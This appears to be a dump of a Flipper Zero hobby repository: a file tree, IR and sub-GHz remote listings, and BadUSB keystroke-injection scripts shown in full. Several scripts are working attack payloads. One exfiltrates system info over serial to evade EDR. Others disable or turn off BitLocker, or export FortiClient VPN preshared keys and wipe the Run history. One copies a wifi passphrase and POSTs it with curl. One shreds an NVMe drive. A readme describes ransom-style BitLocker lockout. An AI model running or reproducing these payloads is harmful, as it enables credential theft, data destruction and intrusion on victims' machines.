├── README.md ├── badusb ├── Linux_helpers │ ├── README.md │ ├── poweroff_linux.txt │ └── shred_nvme_live_ubuntu_mate.txt ├── Zoom_Controls │ ├── Zoom_Controls_Mac │ │ ├── Mute_toggle.txt │ │ └── Video_toggle.txt │ └── Zoom_Controls_Windows │ │ ├── Mute_toggle.txt │ │ └── Video_toggle.txt ├── badusb-js │ ├── read_and_write_serial │ │ ├── read_from_flipper.js │ │ ├── save_computerinfo_serial.js │ │ └── save_wifi_serial.js │ ├── save_computerinfo_serial.js │ └── save_wifi_serial.js ├── base64file_write_to_disk │ └── base64file.txt ├── bitlocker │ ├── bitlocker_disable.txt │ ├── bitlocker_encrypt_password.txt │ ├── bitlocker_turn_off.txt │ └── readme.md ├── exfiltrate forticlient │ ├── exfil_forticlient_vpn.txt │ └── readme.md ├── popos_wifi │ ├── README.md │ └── popos_wifi.txt ├── read-from-flipper-disk-image │ ├── copy-and-execute-example.txt │ ├── readme.md │ └── wait-for-drive-example.txt ├── read_serial_tests │ └── read_test.ps1 ├── read_write_to_mass storage │ ├── copy-and-execute-example.txt │ └── wait-for-drive-example.txt ├── red_dead_redemption_2 │ ├── Five_Finger_Filet.zip │ ├── rdonline_sololobby_linux.txt │ ├── rdr2_bond_with_horse.txt │ ├── rdr2_craft_ammo │ │ ├── README.md │ │ └── rdr2_craft_ammo.txt │ └── rdr2_spam_deadeye.txt ├── save-to-flipper │ ├── latest.txt │ ├── latest_no_altstring.txt │ └── readme.md ├── save_to_flipper_poc │ ├── README.md │ └── save_to_flipper_fast.txt ├── win10_install │ ├── README.md │ ├── win10_part1.txt │ └── win10_part2.txt ├── win11_24h2_install │ ├── readme.md │ ├── win11_24h2_part_1_clear_disk_partitions.txt │ ├── win11_24h2_part_2_install.txt │ └── win11_24h2_part_3_create_admin_acct.txt ├── win11_install │ ├── oobe_bypass_part1.txt │ ├── oobe_bypass_part2.txt │ ├── readme.md │ ├── win11_install_part1.txt │ ├── win11_install_part2.txt │ └── win11_newaccount_bypassoobe.txt ├── windows_helpers │ ├── README.md │ ├── check_for_updates_win10.txt │ ├── check_for_updates_win11.txt │ ├── ipconfig_renew.txt │ ├── shutdown_commandline.txt │ └── windows_eastern_timezone.txt └── windows_login_bypass_utilman │ ├── readme.md │ ├── win_login_bypass_pt1.txt │ └── win_login_bypass_pt2.txt ├── infrared ├── Arris Remote │ ├── Arris.ir │ └── README.md ├── Bose Remote │ ├── Bose.ir │ └── README.md ├── Contemporary_Research │ ├── Contemporary_research.ir │ └── README.md ├── Direct_TV_RC65 │ ├── Direct_tv_rc65.ir │ ├── Directv_RC65_Manual.pdf │ └── README.md ├── EIKI CMXA Remote │ ├── Eiki_cxma.ir │ └── README.md ├── Emerson_Magnavox_Sylvania_FUNAI_N9377 │ ├── Magnavox_N9377.ir │ └── README.md ├── Emerson_NH303UD │ ├── Emerson_nh303ud.ir │ └── README.md ├── Epson Projector Remote 159917600 │ ├── Epson_projector.ir │ └── README.md ├── Evolution_digital_cable_tuner │ ├── Evolution.ir │ ├── README.md │ └── image.jpeg ├── Extron_IR_903 │ ├── Extron_ir903.ir │ ├── README.md │ └── signal-2023-06-22-192626_002.jpeg ├── GPX D2816 Remote │ ├── Gpx_d2816.ir │ └── README.md ├── Gateway Projector 210 │ ├── Gateway_210_proj.ir │ └── README.md ├── Hasbro_bio_bugs │ ├── README.md │ └── biobug_stomper.ir ├── Infocus_hw_nagivator_3 │ ├── Infocus_hw_navig_3.ir │ └── README.md ├── JVC VCR TV 076N0ES010 │ ├── Jvc_vcr_tv.ir │ └── README.md ├── JVC VCR TV LP21138-001 │ ├── Jvc_vcr_tv_lp21138001.ir │ └── README.md ├── Jinhoo Remote │ ├── Jinhoo.ir │ └── README.md ├── LG AKB73275675 │ ├── Lg_akb73275675.ir │ └── README.md ├── LG_75UJ6470 │ ├── Lg_75uj6470.ir │ └── README.md ├── LG_AKB72915206 │ └── Lg_akb72915206.ir ├── Logitech_RI0019_for_ptz_pro_2 │ ├── README.md │ └── logitech_ri0019.ir ├── Magnavox_DVD_NB098 │ ├── Magnavox_nb098.ir │ └── README.md ├── Marantz_RC2100DR │ ├── README.md │ ├── Rc2100dr_cd.ir │ └── Rc2100dr_cdr.ir ├── Monster_LED_Touch_Light │ ├── Monster_led.ir │ └── README.MD ├── Optoma Projector │ ├── Optoma_proj.ir │ └── README.md ├── Panasonic DVD TV │ ├── Panasonic_dvd_tv.ir │ └── README.md ├── Panasonic N2QAYb000210 │ ├── Panasonic_n2qayb00021.ir │ ├── README.md │ └── image.jpeg ├── Panasonic Viera Remote │ ├── Panasonic_viera.ir │ └── README.md ├── Panasonic_DMP-BDT210 │ ├── Panasonic_DMP_BDT210.ir │ └── README.md ├── Panasonic_EUR7621070 │ ├── Eur7621070.ir │ └── README.md ├── Panasonic_N2QAEC000017 │ ├── N2qaec000017.ir │ └── README.md ├── Polycom Remote │ ├── Polycom.ir │ └── README.md ├── Ptzoptics Remote │ ├── Ptz_cam1.ir │ ├── Ptz_cam2.ir │ ├── Ptz_cam3.ir │ ├── Ptz_cam4.ir │ ├── README.md │ ├── image.jpeg │ └── remote │ │ └── cam1.txt ├── RCA_RCR314WR_RCR313BR_3_in_1_universal │ ├── README.md │ └── Rca.ir ├── Samsung_AA59-00580A │ ├── README.md │ └── Samsung.ir ├── Samsung_AH59-025478 │ ├── README.md │ └── Samsung_ah59_025478.ir ├── Sanyo_Blu_Ray_Player_nc088 │ ├── README.md │ └── Sanyo_bluray_nc088.ir ├── Sharp_RRMCGA664WJSA │ ├── README.md │ └── Sharp_rrmcga664wjsa.ir ├── Sony DVD RMT D165A │ ├── README.md │ └── Sony_dvd_rmt_d165a.ir ├── Sony RMT 814 Remote │ ├── README.md │ └── Sony_rmt_814.ir ├── Sony_BDP_S5100_region_free_unlock │ ├── README.md │ └── Unlock_0533.ir ├── Sony_DVD_rmt_D185A │ ├── D185a.ir │ ├── README.md │ └── image.jpeg ├── Sony_RM_PJ27 │ ├── README.md │ └── Sony_rm_pj27_1.ir ├── Sony_RM_R52 │ ├── README.md │ ├── Sony_rm_r52_A.ir │ └── Sony_rm_r52_B.ir ├── Sony_System_Audio_RM_AMU009 │ ├── README.md │ ├── Sony_rm_amu009.ir │ └── signal-2023-06-22-190616_002.jpeg ├── Stinger_HEIGH10_UN1810_DVD_Video_System │ ├── README.md │ └── Un1810.ir ├── TOPCON_PSR-2000 │ ├── README.md │ └── Topcon.ir ├── Tandberg TRC V │ ├── README.md │ ├── Tandberg_Cisco-TRC5-quick-reference-guide-.pdf │ └── Tandberg_trc_v.ir ├── Toshiba_SE-R0108 │ ├── README.md │ └── Toshiba_se_r0108.ir ├── Toshiba_SE-R0305 │ ├── README.md │ ├── Toshiba_se_r0305.ir │ └── image.jpeg ├── Toyota Sienna 2010 Rear Seat Entertainment │ ├── README.md │ └── Rear_seat.ir ├── Tzumi_LED_colorbar │ ├── README.md │ └── Tzumi_led.ir ├── Utilitech_indoor_oscillating_tower_fan │ ├── README.md │ └── utilitech_fan.ir ├── Vizio Remote │ ├── README.md │ └── Vizio.ir ├── Vizio_E70u-D3 │ ├── README.md │ └── Vizio_E70u-D3.ir ├── Vizio_M70Q6-J03 │ ├── README.md │ └── Vizio_M70Q6-J03.ir ├── Vizio_V705-G1 │ ├── README.md │ └── Vizio_V705-G1.ir ├── Yealink_UVC86 │ ├── README.md │ └── Yealink_UVC86.ir ├── Zenith_SC3492Z │ ├── README.md │ └── Zenith_sc3492z.ir ├── evolution_4x1_hdmi_switch │ ├── Evolution_4x1_hdmi.ir │ └── README.md ├── experimental_sony_unlock │ ├── 1533.ir │ ├── README.md │ ├── Take2.ir │ ├── Unlock_0533.ir │ ├── device_code_1533_tests.csv │ ├── oneforall_captures │ │ ├── Blu_1633_sirc20.ir │ │ ├── Dvd_0675_necext.ir │ │ ├── Dvd_0741_sam32.ir │ │ ├── Dvd_1516_sirc20.ir │ │ └── Tv_3519_nec.ir │ └── various_codes.csv ├── hex-captures │ ├── Raw.ir │ └── raw_cli.txt ├── ir_torch.ir ├── magnavox_nb179 │ ├── README.md │ └── mag_mwd_2206_Nb179.ir ├── promethean_prm_35 │ ├── README.md │ └── promethean_prm_35.ir ├── test_windfree │ ├── Ac_test.ir │ ├── Actest2.ir │ └── Remote3.ir └── ugreen_hdmi_switch_3 │ └── ugreen_hdmi_switch_3.ir ├── nrf24 ├── dump_RQR12.03_B0025_BOT01.02.B0015.bin └── readme.md └── subghz ├── ATI_Wonder_II ├── 0.sub ├── 1.sub ├── 2.sub ├── 3.sub ├── 4.sub ├── 5.sub ├── 6.sub ├── 7.sub ├── 8.sub ├── 9.sub ├── A.sub ├── Ati.sub ├── Aux1.sub ├── Aux2.sub ├── Aux3.sub ├── Aux4.sub ├── B.sub ├── C.sub ├── Ch+.sub ├── Ch-.sub ├── Click.sub ├── D.sub ├── Doubleclick.sub ├── Down.sub ├── Dvd.sub ├── E.sub ├── Enter.sub ├── F.sub ├── Ff.sub ├── Fullscreen.sub ├── Hand.sub ├── Help.sub ├── Hookthing.sub ├── Left.sub ├── Lock_screen.sub ├── Menu.sub ├── Mouse_down.sub ├── Mouse_left.sub ├── Mouse_right.sub ├── Mouse_up.sub ├── Mute.sub ├── Ok.sub ├── Pause.sub ├── Pc.sub ├── Play.sub ├── Power.sub ├── README.md ├── Rclick.sub ├── Rec.sub ├── Rew.sub ├── Right.sub ├── Stop.sub ├── Tv.sub ├── Up.sub ├── Vol+.sub ├── Vol-.sub └── remotes │ ├── Ati_arrows.txt │ ├── Ati_media.txt │ ├── Ati_media_alt.txt │ └── Ati_mouse.txt ├── Health_Remote_Light_Switch_Bruteforce ├── README.md ├── off │ ├── 0000_off.sub │ ├── 0000_off_2.sub │ ├── 0001_off.sub │ ├── 0001_off_2.sub │ ├── 0010_off.sub │ ├── 0010_off_2.sub │ ├── 0011_off.sub │ ├── 0011_off_2.sub │ ├── 0100_off.sub │ ├── 0100_off_2.sub │ ├── 0101_off.sub │ ├── 0101_off_2.sub │ ├── 0110_off.sub │ ├── 0110_off_2.sub │ ├── 0111_off.sub │ ├── 0111_off_2.sub │ ├── 1000_off.sub │ ├── 1000_off_2.sub │ ├── 1001_off.sub │ ├── 1001_off_2.sub │ ├── 1010_off.sub │ ├── 1010_off_2.sub │ ├── 1011_off.sub │ ├── 1011_off_2.sub │ ├── 1100_off.sub │ ├── 1100_off_2.sub │ ├── 1101_off.sub │ ├── 1101_off_2.sub │ ├── 1110_off.sub │ ├── 1110_off_2.sub │ ├── 1111_off.sub │ └── 1111_off_2.sub └── on │ ├── 0000_on.sub │ ├── 0000_on_2.sub │ ├── 0001_on.sub │ ├── 0001_on_2.sub │ ├── 0010_on.sub │ ├── 0010_on_2.sub │ ├── 0011_on.sub │ ├── 0011_on_2.sub │ ├── 0100_on.sub │ ├── 0100_on_2.sub │ ├── 0101_on.sub │ ├── 0101_on_2.sub │ ├── 0110_on.sub │ ├── 0110_on_2.sub │ ├── 0111_on.sub │ ├── 0111_on_2.sub │ ├── 1000_on.sub │ ├── 1000_on_2.sub │ ├── 1001_on.sub │ ├── 1001_on_2.sub │ ├── 1010_on.sub │ ├── 1010_on_2.sub │ ├── 1011_on.sub │ ├── 1011_on_2.sub │ ├── 1100_on.sub │ ├── 1100_on_2.sub │ ├── 1101_on.sub │ ├── 1101_on_2.sub │ ├── 1110_on.sub │ ├── 1110_on_2.sub │ ├── 1111_on.sub │ └── 1111_on_2.sub ├── Heath_Zenith_Light_Switch ├── 100.sub ├── 101.sub ├── 102.sub ├── 110.sub ├── 111.sub ├── 112.sub ├── 120.sub ├── 121.sub ├── 122.sub ├── 130.sub ├── 131.sub ├── 132.sub ├── 140.sub ├── 141.sub ├── 142.sub ├── 150.sub ├── 151.sub ├── 152.sub ├── 160.sub ├── 161.sub ├── 162.sub ├── 170.sub ├── 171.sub ├── 172.sub ├── 180.sub ├── 181.sub ├── 182.sub ├── 190.sub ├── 191.sub ├── 192.sub ├── 1A0.sub ├── 1A1.sub ├── 1A2.sub ├── 1B0.sub ├── 1B1.sub ├── 1B2.sub ├── 1C0.sub ├── 1C1.sub ├── 1C2.sub ├── 1D0.sub ├── 1D1.sub ├── 1D2.sub ├── 1E0.sub ├── 1E1.sub ├── 1E2.sub ├── 1F0.sub ├── 1F1.sub ├── 1F2.sub └── README.md ├── M520_Wireless_Doorbell_Receiver ├── README.md ├── doorbell_438022.sub └── doorbell_47B132.sub ├── Planet Projector Remote ├── 1hour.sub ├── 30min.sub ├── 3hour.sub ├── 5hour.sub ├── Auto_mode.sub ├── Brightness_down.sub ├── Brightness_up.sub ├── Color_mode_down.sub ├── Color_mode_up.sub ├── Flash_mode.sub ├── Music_back.sub ├── Music_forward.sub ├── Music_off.sub ├── Music_on.sub ├── Music_play_pause.sub ├── Mute.sub ├── Play_mode.sub ├── Projector_off.sub ├── Projector_on.sub ├── README.md ├── Sleep_mode.sub ├── Sound_mode.sub ├── Space_bright.sub ├── Space_color.sub ├── Space_color_rev.sub ├── Space_dim.sub ├── Space_mode.sub ├── Space_off.sub ├── Space_on.sub ├── Star_mode.sub ├── Star_off.sub ├── Star_on.sub ├── Starry_galaxy_mode.sub ├── Vol_down.sub └── Vol_up.sub ├── STI-3353_Doorbell ├── README.md ├── STI_3353_doorbell.sub └── STI_3353_doorbell_2.sub ├── WEN_3410_remote ├── Off.sub ├── On_speed.sub ├── README.md ├── Time.sub ├── image.jpeg └── remote │ └── WEN_3410.txt ├── dollar_general_pro_essentials_wireless_doorbell ├── Doorbell.sub └── README.md ├── efamily_key_finder ├── README.md ├── Tag1.sub ├── Tag2.sub ├── Tag3.sub ├── Tag4.sub ├── Tag5.sub └── Tag6.sub └── westek_rfk_plug-in_receiver ├── README.md └── westek_rfa108_b.sub /README.md: -------------------------------------------------------------------------------- 1 | # flipperzero 2 | Collection of Flipper Zero related things 3 | 4 | # Interesting or Obscure things you may find here: 5 | 6 | Proof of Concept BadUSB code for saving data back to the Flipper SD card (Windows-only, so far) 7 | 8 | Downgraded, vulnerable (Mousejackable) firmware for compatible Logitech Unifying receivers 9 | 10 | SubGhz remote files for a WEN 3410 air filtration system (replacement remote msrp $17) 11 | 12 | TOPCON remote file for a vision test machine (untested). Troll your... optometrist? 13 | 14 | SubGhz remote files for a Planet Projector 15 | 16 | Basic captures of a remote for a Hasbro BioBug toy 17 | 18 | Remote control files for a PTZoptics camera (replacement remote msrp $29) 19 | 20 | Remote control file for the rear seat DVD player for a 2010 Toyota Sienna 21 | 22 | Holtek subghz codes for a Health/Zenith lightswitch and a Westek remote power switch 23 | 24 | SubGhz remote for an ATI Wonder II 25 | 26 | DVD region unlock codes for a Sony BDP S5100...if it's a region 2 unit... maybe. 27 | -------------------------------------------------------------------------------- /badusb/Linux_helpers/README.md: -------------------------------------------------------------------------------- 1 | A collection of BadUSB scripts to assist on Linux 2 | 3 | poweroff_linux.txt opens a terminal and runs the 'poweroff' command. 4 | 5 | shred_nvme_live_ubuntu_mate.txt is intended to be used in conjuncton with an Ubuntu Mate LiveUSB to boot a system 6 | and then run sudo shred -vn1 on /dev/nvme0n1 Since it's a LiveUSB, sudo will not ask for a password. Refer to the script for further instructions. 7 | -------------------------------------------------------------------------------- /badusb/Linux_helpers/poweroff_linux.txt: -------------------------------------------------------------------------------- 1 | REM Power off Linux from terminal 2 | 3 | DELAY 500 4 | CTRL-ALT T 5 | DELAY 1000 6 | STRING poweroff 7 | ENTER 8 | 9 | -------------------------------------------------------------------------------- /badusb/Linux_helpers/shred_nvme_live_ubuntu_mate.txt: -------------------------------------------------------------------------------- 1 | REM Using an Ubuntu Mate Desktop bootable flash drive booted as a Live USB 2 | REM this script will run the shred command on the first nvme drive the system is aware of (change as needed) 3 | 4 | REM Run this once you're at the Install prompt 5 | 6 | REM Press Try Ubuntu Mate and then wait for manual button press on Flipper 7 | DELAY 500 8 | TAB 9 | DELAY 100 10 | ENTER 11 | WAIT_FOR_BUTTON_PRESS 12 | 13 | REM Run this only after the desktop has fully booted 14 | DELAY 500 15 | CTRL-ALT T 16 | DELAY 1000 17 | STRING sudo shred -vn1 /dev/nvme0n1 18 | ENTER 19 | -------------------------------------------------------------------------------- /badusb/Zoom_Controls/Zoom_Controls_Mac/Mute_toggle.txt: -------------------------------------------------------------------------------- 1 | REM Demo Zoom Mute toggle for MacOS 2 | REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized 3 | 4 | GUI-SHIFT A 5 | -------------------------------------------------------------------------------- /badusb/Zoom_Controls/Zoom_Controls_Mac/Video_toggle.txt: -------------------------------------------------------------------------------- 1 | REM Demo Zoom Mute toggle for MacOS 2 | REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized 3 | 4 | GUI-SHIFT V 5 | -------------------------------------------------------------------------------- /badusb/Zoom_Controls/Zoom_Controls_Windows/Mute_toggle.txt: -------------------------------------------------------------------------------- 1 | REM Keyboard shortcut to toggle Microphone Mute 2 | REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized 3 | 4 | ALT A 5 | -------------------------------------------------------------------------------- /badusb/Zoom_Controls/Zoom_Controls_Windows/Video_toggle.txt: -------------------------------------------------------------------------------- 1 | REM Keyboard shortcut to toggle the Video Camera 2 | REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized 3 | 4 | ALT V 5 | -------------------------------------------------------------------------------- /badusb/badusb-js/read_and_write_serial/save_computerinfo_serial.js: -------------------------------------------------------------------------------- 1 | // Title: Save To Flipper via Serial (adapted to JS) 2 | // Author: emptythevoid and LupusE 3 | // Credit to Gas Station Hot Dog for improvements in filename generation 4 | // Target: Windows 10, Windows 11 5 | // Version: 1.2 6 | // Category: Data Exfiltration 7 | // Desc: This script runs the Get-ComputerInfo command and saves it to 8 | // the Flipper by it's serial interface, which may bypass EDR 9 | // By default, data is stored on the Flipper in the apps_data folder 10 | 11 | let badusb = require("badusb"); 12 | let notify = require("notification"); 13 | let flipper = require("flipper"); 14 | let dialog = require("dialog"); 15 | 16 | badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" }); 17 | dialog.message("Save to Flipper Serial", "Press OK to start"); 18 | 19 | if (badusb.isConnected()) { 20 | notify.blink("green", "short"); 21 | 22 | badusb.press("GUI", "r"); 23 | delay(500); 24 | 25 | badusb.println("powershell"); 26 | delay(750); 27 | badusb.println("$d=(Get-ComputerInfo|Out-String);"); 28 | badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); 29 | badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); 30 | badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}'); 31 | 32 | badusb.quit(); 33 | 34 | 35 | 36 | notify.success(); 37 | } else { 38 | print("USB not connected"); 39 | notify.error(); 40 | } 41 | -------------------------------------------------------------------------------- /badusb/badusb-js/save_computerinfo_serial.js: -------------------------------------------------------------------------------- 1 | // Title: Save To Flipper via Serial (adapted to JS) 2 | // Author: emptythevoid and LupusE 3 | // Credit to Gas Station Hot Dog for improvements in filename generation 4 | // Target: Windows 10, Windows 11 5 | // Version: 1.2 6 | // Category: Data Exfiltration 7 | // Desc: This script runs the Get-ComputerInfo command and saves it to 8 | // the Flipper by it's serial interface, which may bypass EDR 9 | // By default, data is stored on the Flipper in the apps_data folder 10 | 11 | let badusb = require("badusb"); 12 | let notify = require("notification"); 13 | let flipper = require("flipper"); 14 | let dialog = require("dialog"); 15 | 16 | badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" }); 17 | dialog.message("Save to Flipper Serial", "Press OK to start"); 18 | 19 | if (badusb.isConnected()) { 20 | notify.blink("green", "short"); 21 | 22 | badusb.press("GUI", "r"); 23 | delay(500); 24 | 25 | badusb.println("powershell"); 26 | delay(750); 27 | badusb.println("$d=(Get-ComputerInfo|Out-String);"); 28 | badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); 29 | badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); 30 | badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}'); 31 | 32 | badusb.quit(); 33 | 34 | 35 | 36 | notify.success(); 37 | } else { 38 | print("USB not connected"); 39 | notify.error(); 40 | } 41 | -------------------------------------------------------------------------------- /badusb/bitlocker/bitlocker_disable.txt: -------------------------------------------------------------------------------- 1 | REM launch command prompt as admin as fast as possible 2 | GUI r 3 | DELAY 500 4 | STRING powershell Start-Process cmd -Verb runAs 5 | ENTER 6 | DELAY 3000 7 | ALT y 8 | DELAY 500 9 | 10 | STRING manage-bde -protectors -Disable C: -RebootCount 0 11 | ENTER 12 | DELAY 500 13 | ALT F4 14 | -------------------------------------------------------------------------------- /badusb/bitlocker/bitlocker_turn_off.txt: -------------------------------------------------------------------------------- 1 | REM Turn off bitlocker on C: 2 | REM This will begin decrypting the drive. When drive is fully decrypted, the protectors will also be removed. 3 | 4 | REM Author: emptythevoid 5 | 6 | REM Launch command prompt using GUI x (Windows 11-only, but more reliable 7 | GUI x 8 | DELAY 200 9 | STRING A 10 | DELAY 1000 11 | ALT y 12 | DELAY 3000 13 | 14 | REM Launch command prompt using GUI r. More compatible, less reliable 15 | REM GUI r 16 | REM DELAY 500 17 | REM STRING powershell Start-Process cmd -Verb runAs 18 | REM ENTER 19 | REM DELAY 3000 20 | REM ALT y 21 | REM DELAY 500 22 | 23 | REM Turn off bitlocker on C: 24 | STRING manage-bde -off C: 25 | ENTER 26 | DELAY 500 27 | 28 | REM may need this if using traditional command prompt 29 | REM ALT F4 30 | 31 | STRING exit 32 | ENTER 33 | -------------------------------------------------------------------------------- /badusb/bitlocker/readme.md: -------------------------------------------------------------------------------- 1 | # Research into manipulating Bitlocker using BadUSB 2 | 3 | All scripts require the current user to have administrative permissions on Windows. 4 | 5 | bitlocker_disable.txt -- Immediately suspends Bitlocker on C:. Does not remove it 6 | 7 | bitlocker_turn_off.txt -- Turns off Bitlocker and begins decryption of C:. When decryption is complete, all key protectors are removed. 8 | 9 | bitlocker_encrypt_password.txt: 10 | 11 | Uses base64 to dump a registry.pol into Windows to allow tablets (Surface Pro, etc) to have pre-boot authentication enabled. Then perform a gpupdate /force (without this, Bitlocker will fail to enable with just a password when it detects the computer is a tablet, aka "slate") 12 | 13 | If Bitlocker is already enabled, all key protectors are removed 14 | 15 | Enable Bitlocker on C: and skip hardware test. If Bitlocker wasn't previously enabled, it gets turned on and drive begins encrypting 16 | 17 | Remove the default TPM key protector that gets created on new Bitlocker enabled C: 18 | 19 | Manually set an attacker-controlled password as the only key protector. Must be at least 8 characters 20 | 21 | Enable the new password protector immediately. 22 | 23 | Optional: Reboot after a pre-defined delay or immediately, clear history, close window.' 24 | 25 | On next boot, Windows will require the attacker-controlled password to boot, and no recovery key will exist. 26 | -------------------------------------------------------------------------------- /badusb/exfiltrate forticlient/exfil_forticlient_vpn.txt: -------------------------------------------------------------------------------- 1 | REM Forticlient config export using BadUSB 2 | REM Author: emptythevoid 3 | REM 8/23/24 4 | 5 | 6 | REM Forticlient file is exported with password. Export does NOT require admin 7 | REM This export doesn't include VPN login information, but it does include the preshared key and VPN configuration. 8 | REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password 9 | REM restore the config to Forticlient using 10 | REM Requires Admin Rights 11 | REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password 12 | 13 | REM USAGE: Set -p password to your secret password - it can be anything. It's just something Forticlient requires 14 | REM Set the output path to wherever you want it to go. 15 | 16 | REM export the forticlient configuration to file 17 | GUI r 18 | DELAY 500 19 | STRING "C:\Program Files\Fortinet\FortiClient\FCConfig" -m all -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password 20 | DELAY 500 21 | ENTER 22 | 23 | DELAY 2000 24 | 25 | REM Clear the Run history and exit 26 | GUI r 27 | DELAY 500 28 | STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 29 | ENTER 30 | STRING exit 31 | ENTER 32 | -------------------------------------------------------------------------------- /badusb/exfiltrate forticlient/readme.md: -------------------------------------------------------------------------------- 1 | This script will export the Forticlient configuration on a Windows client. This serves purely as a proof of concept. 2 | 3 | YOU have to decide what to do with it. As-is, it will export to the desktop of a user account named "user." YOU MUST CHANGE THIS! 4 | 5 | Note: Exporting the configuration in a normal setup does not require admin privileges. 6 | 7 | This export doesn't include VPN login information, but it does include the preshared key and VPN configuration. 8 | 9 | The command that's run to perform the export looks like this, where 'password' is a password that you choose. 10 | You'll need it when you try to import it. Change the output path however you want. 11 | 12 | ```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password``` 13 | 14 | To import ("Restore") the configuration, run the below in an admin primpt, with the password you originally set: 15 | 16 | ```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password``` 17 | 18 | As a final step, the script will clear the history from the run dialog. 19 | -------------------------------------------------------------------------------- /badusb/popos_wifi/README.md: -------------------------------------------------------------------------------- 1 | Demo of using PopOS 22.04 GUI to exfiltrate the passphrase of the first wifi connection present in network manager. Uses a webhook. 2 | 3 | This is done primarily via GUI to avoid needing sudo trying to extract the data using the terminal. 4 | 5 | Replace with your own appropriate webhook to capture the data. 6 | 7 | Adjust timings as needed. This is purely a proof-of-concept. 8 | 9 | IT ONLY EXTRACTS THE PASSPHRASE, NOT THE SSID 10 | -------------------------------------------------------------------------------- /badusb/popos_wifi/popos_wifi.txt: -------------------------------------------------------------------------------- 1 | REM This is BadUSB demo to grab the top-most wifi password from NetworkManager GUI on PopOS (no sudo needed) 2 | 3 | REM Open the app runner and choose network manager 4 | REM Have to send GUI command twice to get it to trigger the menu 5 | DELAY 1000 6 | GUI GUI 7 | DELAY 1000 8 | STRING network 9 | DELAY 500 10 | ENTER 11 | 12 | REM Navigate the NetworkManager GUI 13 | REM Get to the wifi section and edit first connection listed 14 | DELAY 1000 15 | STRING wifi 16 | DELAY 500 17 | ENTER 18 | TAB 19 | TAB 20 | TAB 21 | TAB 22 | ENTER 23 | DELAY 500 24 | TAB 25 | RIGHTARROW 26 | RIGHTARROW 27 | RIGHTARROW 28 | RIGHTARROW 29 | 30 | REM On the security tab, copy the wifi password to clipboard 31 | DELAY 100 32 | TAB 33 | TAB 34 | TAB 35 | DELAY 100 36 | SPACE 37 | SHIFT TAB 38 | CTRL C 39 | 40 | REM Make this into a curl payload to exfiltrate 41 | DELAY 1000 42 | GUI t 43 | DELAY 500 44 | STRING curl -X POST -d '{"wifipass":" 45 | CTRL-SHIFT v 46 | STRING "}' 47 | ENTER 48 | DELAY 1000 49 | 50 | REM Cleanup 51 | REM Need to find a way to clear out the clipboard 52 | 53 | REM Close out of all the Windows that BadUSB opened 54 | ALT F4 55 | DELAY 100 56 | ALT F4 57 | DELAY 100 58 | ALT F4 59 | DELAY 100 60 | ALT F4 61 | -------------------------------------------------------------------------------- /badusb/read-from-flipper-disk-image/copy-and-execute-example.txt: -------------------------------------------------------------------------------- 1 | REM Author: emptythevoid 2 | REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup 3 | REM Target: Windows 10, 11 4 | REM Category: PoC 5 | 6 | REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution 7 | REM Powershell will wait until a device with the specified drive label is found. 8 | REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it. 9 | REM disk image in Flipper must have the drive label: flipdisk 10 | 11 | REM Open Powershell 12 | DELAY 500 13 | GUI r 14 | DELAY 500 15 | 16 | REM Run Powershell by full path to avoid Windows Terminal. 17 | STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe 18 | 19 | DELAY 500 20 | ENTER 21 | DELAY 750 22 | 23 | STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;$Desktoppath=[environment]::getfolderpath("desktop");cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange 24 | 25 | ENTER 26 | 27 | -------------------------------------------------------------------------------- /badusb/read-from-flipper-disk-image/readme.md: -------------------------------------------------------------------------------- 1 | Example code that runs powershell via BadUSB that waits for a drive label to mount, and then runs a command. You can use this to read a payload from the Flipper's SD card, such as an executable. 2 | 3 | Usage: 